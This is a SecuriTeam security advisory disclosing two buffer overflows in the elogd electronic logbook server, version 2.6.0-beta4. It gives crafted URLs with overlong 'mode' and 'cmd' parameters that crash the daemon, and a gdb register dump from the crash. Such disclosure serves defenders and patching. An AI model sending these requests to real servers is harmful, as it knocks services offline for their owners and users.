[UNIX] elogd mode and cmd Buffer Overflows

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

elogd mode and cmd Buffer Overflows

SUMMARY

<http://midas.psi.ch/elog/> elogd is a "web server program for Electronic
Logbook ELOG". Two buffer overflows vulnerabilities have been discovered
in elogd.

DETAILS

Vulnerable Systems:
* elogd version 2.6.0-beta4

By sending a special crafted request, the daemon will crash.

A request such as
http://www.server.tld/:8080/demo/?select=1&mode=AAAAAAAAAAAAAAAAAAAAAAAAAAAAA<lots more>
or
http://www.server.tld/:8080/demo/?cmd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAA<lots
more>

resulted in the following:

0x080bcb31 in server_loop ()
(gdb) i r
eax 0x8001 32769
ecx 0xbfffe541 -1073748671
edx 0x8001 32769
ebx 0xc0000000 -1073741824
esp 0xbffd8060 0xbffd8060
ebp 0x90f77f0 0x90f77f0
esi 0x90f77f9 152008697
edi 0x90f9226 152015398
eip 0x80bcb31 0x80bcb31
eflags 0x10202 66050
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

ADDITIONAL INFORMATION

The information has been provided by <mailto:fd@xxxxxxx> GroundZero
Security.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] TinyWeb Server DoS Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] 3Com FTP Server Buffer Overflow (CD)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] Automagic SQL Injector
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [REVS] Exploring Windows CE Shellcode
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Windows CE/ARM and goes on to develop an exploit. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)